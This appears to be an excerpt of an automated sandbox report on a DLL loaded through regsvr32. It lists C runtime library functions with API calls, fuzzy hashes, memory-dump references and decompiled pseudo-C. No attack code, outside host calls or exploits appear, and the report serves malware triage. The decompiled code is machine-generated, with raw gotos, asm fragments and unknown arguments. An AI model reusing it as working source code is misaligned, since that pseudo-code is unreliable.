Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
Instruction ID: bbd5206a0d1e9e7998282a27357822fda93bbf2a7544b94f4d192a8184626612
Opcode Fuzzy Hash: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
Instruction Fuzzy Hash: 9D41BF33B1DA6241FA15AB26FC541B52392AF06BE0F89C975DD1D87794FE3CE4458300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6B8D4 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFA0AE6B8E3
FlsGetValue.KERNEL32 ref: 00007FFA0AE6B8F8
FlsSetValue.KERNEL32 ref: 00007FFA0AE6B919
FlsSetValue.KERNEL32 ref: 00007FFA0AE6B946
FlsSetValue.KERNEL32 ref: 00007FFA0AE6B957
FlsSetValue.KERNEL32 ref: 00007FFA0AE6B968
SetLastError.KERNEL32 ref: 00007FFA0AE6B983

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: eec7dff64ec5c52d9157cbd157dfbab6f6a7a87af12ff6c832096e5b6ec65f04
Instruction ID: 62f850adaceba7e2952be18691ae86a0ac0d155818335489e6e097b9eadb6dcf
Opcode Fuzzy Hash: eec7dff64ec5c52d9157cbd157dfbab6f6a7a87af12ff6c832096e5b6ec65f04
Instruction Fuzzy Hash: 13212832E4CA7642FA647731F95523962525F4BBE0F14CEB8D96E8B6D6FE2CA4408300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE728C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFA0AE728F1
GetLastError.KERNEL32 ref: 00007FFA0AE728FD
CloseHandle.KERNEL32 ref: 00007FFA0AE72915
CreateFileW.KERNEL32 ref: 00007FFA0AE72940
WriteConsoleW.KERNEL32 ref: 00007FFA0AE7295F

Strings

CONOUT$, xrefs: 00007FFA0AE72921

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
Instruction ID: 63931b6a153e1067be6e4b03cf1a3097e12117583d5c3e1bfe369f97d35c59fd
Opcode Fuzzy Hash: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
Instruction Fuzzy Hash: 21119322B18B6187F750AB66F85436962A4FB8AFE4F048274DA5D877A4EF3CD4448740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6BA4C Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000,00007FFA0AE6D8B7,?,?,?), ref: 00007FFA0AE6BA5B
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000,00007FFA0AE6D8B7,?,?,?), ref: 00007FFA0AE6BA91
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000,00007FFA0AE6D8B7,?,?,?), ref: 00007FFA0AE6BABE
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000,00007FFA0AE6D8B7,?,?,?), ref: 00007FFA0AE6BACF
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000,00007FFA0AE6D8B7,?,?,?), ref: 00007FFA0AE6BAE0
SetLastError.KERNEL32(?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000,00007FFA0AE6D8B7,?,?,?), ref: 00007FFA0AE6BAFB

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 2fa0da27fe614c465e9bfeef243b6df5757a5299518a3d762b3cf139a2d538dd
Instruction ID: aac880881b6fae65a501f7969ae66ddbe8cdf6c38977a555e049c62a2ffa5a32
Opcode Fuzzy Hash: 2fa0da27fe614c465e9bfeef243b6df5757a5299518a3d762b3cf139a2d538dd
Instruction Fuzzy Hash: 64115E32B4CA6242F9147731F56513922525F467F0F04CFB5D82E876D6FE2CB4019200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE69C24 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFA0AE69C49
GetProcAddress.KERNEL32 ref: 00007FFA0AE69C5F
FreeLibrary.KERNEL32 ref: 00007FFA0AE69C86

Strings

CorExitProcess, xrefs: 00007FFA0AE69C58
mscoree.dll, xrefs: 00007FFA0AE69C40

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
Instruction ID: 35e21d0814290f055123282e0df0f008ce51abbae9720aac524d26fa0f2459ad
Opcode Fuzzy Hash: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
Instruction Fuzzy Hash: ADF04F62A1871282EB10AF34F4543796360EF8B7A1F54C67AD96E462F5EF3CD044C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6EB68 Relevance: 7.6, APIs: 5, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00007FFA7FFA0AE6EB68(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0xae6eb9a;
				if (sil >= 0) goto 0xae6eb9a;
				E00007FFA7FFA0AE71CEC(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0xae6ebf1;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0xae6ebb5;
				asm("dec eax");
				if (_t42 >= 0) goto 0xae6ebb5;
				E00007FFA7FFA0AE71CEC(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0xae6ebf1;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0xae6ebd1;
				asm("dec eax");
				if (_t43 >= 0) goto 0xae6ebd1;
				E00007FFA7FFA0AE71CEC(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0xae6ebf1;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0xae6ebf1;
				asm("dec eax");
				if (_t44 >= 0) goto 0xae6ebf1;
				if ((dil & 0x00000010) == 0) goto 0xae6ebee;
				E00007FFA7FFA0AE71CEC(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0xae6ec0b;
				asm("dec eax");
				if (_t46 >= 0) goto 0xae6ec0b;
				E00007FFA7FFA0AE71CEC(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}

APIs

_set_statfp.LIBCMT ref: 00007FFA0AE6EB90
_set_statfp.LIBCMT ref: 00007FFA0AE6EBAB
_set_statfp.LIBCMT ref: 00007FFA0AE6EBC7
_set_statfp.LIBCMT ref: 00007FFA0AE6EC03

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
Instruction ID: 202f475303f7da37817a64b1b833fe1bbdd36b209cc940da674033cbaa56330a
Opcode Fuzzy Hash: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
Instruction Fuzzy Hash: CA11427BE5CA7301F6783374F55637912416F5B3A4F08CEB4E96F162E6AE2C68894104

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6BB14 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFA0AE69403,?,?,00000000,00007FFA0AE6969E,?,?,?,?,?,00007FFA0AE6962A), ref: 00007FFA0AE6BB33
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE69403,?,?,00000000,00007FFA0AE6969E,?,?,?,?,?,00007FFA0AE6962A), ref: 00007FFA0AE6BB52
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE69403,?,?,00000000,00007FFA0AE6969E,?,?,?,?,?,00007FFA0AE6962A), ref: 00007FFA0AE6BB7A
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE69403,?,?,00000000,00007FFA0AE6969E,?,?,?,?,?,00007FFA0AE6962A), ref: 00007FFA0AE6BB8B
FlsSetValue.KERNEL32(?,?,?,00007FFA0AE69403,?,?,00000000,00007FFA0AE6969E,?,?,?,?,?,00007FFA0AE6962A), ref: 00007FFA0AE6BB9C

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8052eee4b0d8af64d03de27b504a711c4d5b3c24d31682e890b399a3a393ee09
Instruction ID: 22261c6bf07d7fafff0844622534df78453f59dd07d61006c6901b12f0ba52bb
Opcode Fuzzy Hash: 8052eee4b0d8af64d03de27b504a711c4d5b3c24d31682e890b399a3a393ee09
Instruction Fuzzy Hash: D9115C32F4CA6642FA58B731F99223963425F467F0F54CAB4D82D8B6DAFE2CB4018300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6B9A8 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFA0AE6B9B9
FlsSetValue.KERNEL32 ref: 00007FFA0AE6B9D8
FlsSetValue.KERNEL32 ref: 00007FFA0AE6BA00
FlsSetValue.KERNEL32 ref: 00007FFA0AE6BA11
FlsSetValue.KERNEL32 ref: 00007FFA0AE6BA22

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 42504d049ca0b81dd607a4491970e33291414fa471f24a262c13f0c89c120e85
Instruction ID: 3f195d4e8249ad56f552ff316b1babe942bf5b8af64aa3ca8ef3c76e2495574b
Opcode Fuzzy Hash: 42504d049ca0b81dd607a4491970e33291414fa471f24a262c13f0c89c120e85
Instruction Fuzzy Hash: 6211E832E88A6742F968B731F86627912414F477E4F58CFB9D83E8A2D6FD2CB4419204

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE70958 Relevance: 6.3, APIs: 4, Instructions: 305
fileCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFA7FFA0AE70958(void* __ecx, signed int __edx, void* __esi, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t181;
				signed int _t186;
				signed int _t193;
				signed int _t198;
				void* _t212;
				signed char _t213;
				void* _t263;
				signed long long _t264;
				signed long long _t267;
				long long _t269;
				signed long long _t271;
				long long _t276;
				long long _t278;
				long long _t280;
				intOrPtr* _t289;
				intOrPtr _t294;
				long long _t295;
				long long _t318;
				void* _t326;
				long long _t327;
				void* _t328;
				long long _t329;
				long long _t331;
				signed char* _t332;
				signed char* _t333;
				signed char* _t334;
				intOrPtr* _t335;
				void* _t336;
				void* _t337;
				signed long long _t338;
				intOrPtr _t341;
				signed long long _t343;
				void* _t345;
				intOrPtr* _t347;
				intOrPtr _t351;
				signed long long _t356;
				signed long long _t359;
				signed long long _t361;
				void* _t364;
				long long _t365;
				long long _t367;
				char _t368;
				void* _t372;
				signed char* _t373;
				signed long long _t375;

				_t263 = _t337;
				_t336 = _t263 - 0x57;
				_t338 = _t337 - 0xe0;
				 *((long long*)(_t336 - 9)) = 0xfffffffe;
				 *((long long*)(_t263 + 8)) = __rbx;
				_t264 =  *0xaede008; // 0x81ced31fdcd6
				 *(_t336 + 0x17) = _t264 ^ _t338;
				 *((long long*)(_t336 - 0x49)) = __r8;
				_t289 = __rcx;
				_t367 =  *((intOrPtr*)(_t336 + 0x7f));
				 *((long long*)(_t336 - 0x51)) = _t367;
				 *(_t336 - 0x19) = __edx;
				_t267 = __edx >> 6;
				 *(_t336 - 0x59) = _t267;
				 *(_t336 - 0x11) = __edx;
				_t375 = __edx + __edx * 8;
				_t269 =  *((intOrPtr*)( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t267 * 8)) + 0x28 + _t375 * 8));
				 *((long long*)(_t336 - 0x29)) = _t269;
				r12d = r9d;
				_t365 = _t364 + __r8;
				 *((long long*)(_t336 - 0x71)) = _t365;
				 *((intOrPtr*)(_t336 - 0x61)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)(_t367 + 0x28)) != dil) goto 0xae709f8;
				0xae69140();
				_t294 =  *((intOrPtr*)(_t367 + 0x18));
				r8d =  *(_t294 + 0xc);
				 *(_t336 - 0x5d) = r8d;
				 *((long long*)(__rcx)) = _t269;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t336 - 0x49)) - _t365 >= 0) goto 0xae70db8;
				_t271 = __edx >> 6;
				 *(_t336 - 0x21) = _t271;
				 *((char*)(_t338 + 0x40)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t336 - 0x7d)) = 0;
				r12d = 1;
				if (r8d != 0xfde9) goto 0xae70bc0;
				_t347 = 0x3e + _t375 * 8 +  *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t271 * 8));
				if ( *_t347 == dil) goto 0xae70a74;
				_t372 = _t329 + 1;
				if (_t372 - 5 < 0) goto 0xae70a61;
				if (_t372 == 0) goto 0xae70b52;
				r12d =  *((char*)(_t294 + 0x7ffa0aede8f0));
				r12d = r12d + 1;
				_t181 = r12d - 1;
				 *((intOrPtr*)(_t336 - 0x69)) = _t181;
				_t341 = _t181;
				if (_t341 -  *((intOrPtr*)(_t336 - 0x71)) - __r8 > 0) goto 0xae70d27;
				_t295 = _t329;
				 *((char*)(_t336 + _t295 - 1)) =  *_t347;
				if (_t295 + 1 - _t372 < 0) goto 0xae70ab9;
				if (_t341 <= 0) goto 0xae70aea;
				E00007FFA7FFA0AE664D0( *( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + 0x3e + _t375 * 8) & 0x000000ff, 0, __esi, __esp, _t336 - 1 + _t372, __r8, _t329, __r8, _t341);
				_t318 = _t329;
				 *((intOrPtr*)( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + _t318 + 0x3e + _t375 * 8)) = dil;
				if (_t318 + 1 - _t372 < 0) goto 0xae70aed;
				 *((long long*)(_t336 - 0x41)) = _t329;
				_t276 = _t336 - 1;
				 *((long long*)(_t336 - 0x39)) = _t276;
				_t186 = (0 | r12d == 0x00000004) + 1;
				r12d = _t186;
				r8d = _t186;
				 *((long long*)(_t338 + 0x20)) = _t367;
				E00007FFA7FFA0AE71744(_t276, _t289, _t336 - 0x7d, _t336 - 0x39, _t341, _t336 - 0x41);
				if (_t276 == 0xffffffff) goto 0xae70db8;
				_t331 = __r8 +  *((intOrPtr*)(_t336 - 0x69)) - 1;
				goto 0xae70c55;
				_t368 =  *((char*)(_t276 + 0x7ffa0aede8f0));
				_t212 = _t368 + 1;
				_t343 =  *((intOrPtr*)(_t336 - 0x71)) - _t331;
				if (_t212 - _t343 > 0) goto 0xae70d55;
				 *((long long*)(_t336 - 0x69)) = _t329;
				 *((long long*)(_t336 - 0x31)) = _t331;
				_t193 = (0 | _t212 == 0x00000004) + 1;
				r14d = _t193;
				r8d = _t193;
				_t278 =  *((intOrPtr*)(_t336 - 0x51));
				 *((long long*)(_t338 + 0x20)) = _t278;
				E00007FFA7FFA0AE71744(_t278, _t289, _t336 - 0x7d, _t336 - 0x31, _t343, _t336 - 0x69);
				if (_t278 == 0xffffffff) goto 0xae70db8;
				_t332 = _t331 + _t368;
				r12d = r14d;
				goto 0xae70c55;
				_t359 =  *(_t336 - 0x59);
				_t351 =  *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t359 * 8));
				_t213 =  *(_t351 + 0x3d + _t375 * 8);
				if ((_t213 & 0x00000004) == 0) goto 0xae70bf7;
				 *((char*)(_t336 + 7)) =  *((intOrPtr*)(_t351 + 0x3e + _t375 * 8));
				 *((char*)(_t336 + 8)) =  *_t332;
				 *(_t351 + 0x3d + _t375 * 8) = _t213 & 0x000000fb;
				r8d = 2;
				goto 0xae70c40;
				r8d =  *_t332 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 - 0x51)) + 0x18)))) + _t343 * 2)) >= 0) goto 0xae70c3a;
				_t373 =  &(_t332[1]);
				if (_t373 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0xae70d93;
				r8d = 2;
				if (E00007FFA7FFA0AE6E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t332, _t329, _t332, _t336, _t343,  *((intOrPtr*)(_t336 - 0x51))) == 0xffffffff) goto 0xae70db8;
				_t333 = _t373;
				goto 0xae70c55;
				_t198 = E00007FFA7FFA0AE6E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t333, _t329, _t333, _t336, _t365,  *((intOrPtr*)(_t336 - 0x51)));
				if (_t198 == 0xffffffff) goto 0xae70db8;
				_t334 =  &(_t333[1]);
				 *((long long*)(_t338 + 0x38)) = _t329;
				 *((long long*)(_t338 + 0x30)) = _t329;
				 *((intOrPtr*)(_t338 + 0x28)) = 5;
				_t280 = _t336 + 0xf;
				 *((long long*)(_t338 + 0x20)) = _t280;
				r9d = r12d;
				_t345 = _t336 - 0x7d;
				E00007FFA7FFA0AE6D698();
				r14d = _t198;
				if (_t198 == 0) goto 0xae70db8;
				 *((long long*)(_t338 + 0x20)) = _t329;
				r8d = _t198;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xae70db0;
				 *((intOrPtr*)(_t289 + 4)) = __esi -  *((intOrPtr*)(_t336 - 0x49)) +  *((intOrPtr*)(_t289 + 8));
				if ( *((intOrPtr*)(_t336 - 0x79)) - r14d < 0) goto 0xae70db8;
				if ( *((char*)(_t338 + 0x40)) != 0xa) goto 0xae70d10;
				 *((short*)(_t338 + 0x40)) = 0xd;
				 *((long long*)(_t338 + 0x20)) = _t329;
				_t128 = _t280 - 0xc; // 0x1
				r8d = _t128;
				_t326 = _t338 + 0x40;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xae70db0;
				if ( *((intOrPtr*)(_t336 - 0x79)) - 1 < 0) goto 0xae70db8;
				 *((intOrPtr*)(_t289 + 8)) =  *((intOrPtr*)(_t289 + 8)) + 1;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + 1;
				if (_t334 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0xae70db8;
				r8d =  *(_t336 - 0x5d);
				goto 0xae70a23;
				if (_t326 <= 0) goto 0xae70d50;
				_t335 = _t334 - _t373;
				 *((char*)( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t359 * 8)) + _t373 + 0x3e + _t375 * 8)) =  *((intOrPtr*)(_t335 + _t373));
				if (1 - _t326 < 0) goto 0xae70d2f;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) +  *((intOrPtr*)(_t289 + 4));
				goto 0xae70db8;
				if (_t345 <= 0) goto 0xae70d8d;
				_t327 = _t329;
				_t361 =  *(_t336 - 0x19) >> 6;
				_t356 =  *(_t336 - 0x11) +  *(_t336 - 0x11) * 8;
				 *((char*)( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t361 * 8)) + _t356 * 8 + _t327 + 0x3e)) =  *((intOrPtr*)(_t327 + _t335));
				_t328 = _t327 + 1;
				if (2 - _t345 < 0) goto 0xae70d6d;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + r8d;
				goto 0xae70db8;
				 *((char*)(_t356 + 0x3e + _t375 * 8)) =  *_t335;
				 *( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) =  *( *((intOrPtr*)(0x7ffa0ae60000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) | 0x00000004;
				_t174 = _t328 + 1; // 0x1
				 *((intOrPtr*)(_t289 + 4)) = _t174;
				goto 0xae70db8;
				 *_t289 = GetLastError();
				return E00007FFA7FFA0AE63A70(_t206,  *((intOrPtr*)(_t336 - 0x61)),  *((intOrPtr*)(_t289 + 4)),  *(_t336 + 0x17) ^ _t338);
			}

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFA0AE709DF
WriteFile.KERNEL32 ref: 00007FFA0AE70CA6
WriteFile.KERNEL32 ref: 00007FFA0AE70CEF
GetLastError.KERNEL32 ref: 00007FFA0AE70DB0

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
Instruction ID: 94e2e337c297d290a5423d5d2d6e762b66a2ccd3596ecde91775e8c4cd9110b1
Opcode Fuzzy Hash: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
Instruction Fuzzy Hash: BED1C133B08B918AE751DF79E4802AC37A1EB46798B148276CF5D57B99EE38D406C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE7129C Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FFA7FFA0AE7129C(void* __ebx, signed int __ecx, void* __ebp, void* __esp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed short _v80;
				void* _v92;
				signed int _v96;
				intOrPtr _v104;
				intOrPtr _v108;
